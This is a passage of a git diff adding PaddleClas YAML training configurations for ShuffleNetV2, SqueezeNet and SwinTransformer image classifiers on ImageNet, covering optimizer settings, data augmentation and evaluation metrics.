ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - 
RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml new file mode 100644 index 0000000..aa1cce1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + 
save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: 
[1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml new file mode 100644 index 0000000..3f0742e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_33 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 
0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml new file mode 100644 index 0000000..f14a249 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 
224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml new file mode 100644 index 0000000..dd4820d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + 
save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: 
[1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml new file mode 100644 index 0000000..9a05a59 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.25 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] 
+ order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml new file mode 100644 index 0000000..c871ec7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x2_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.25 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + 
- RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml new file mode 100644 index 0000000..0f5d972 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_0.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: 
./inference + +# model architecture +Arch: + name: SqueezeNet1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.02 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml new file mode 100644 index 0000000..1f23922 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SqueezeNet/SqueezeNet1_1.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SqueezeNet1_1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.02 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: 
DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml new file mode 100644 index 0000000..5d976c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window12_384.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_base_patch4_window12_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + 
warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: 
ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml new file mode 100644 index 0000000..efbd427 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SwinTransformer/SwinTransformer_base_patch4_window7_224.yaml @@ -0,0 +1,159 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: SwinTransformer_base_patch4_window7_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: absolute_pos_embed relative_position_bias_table .bias norm + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 20 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + 
std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: 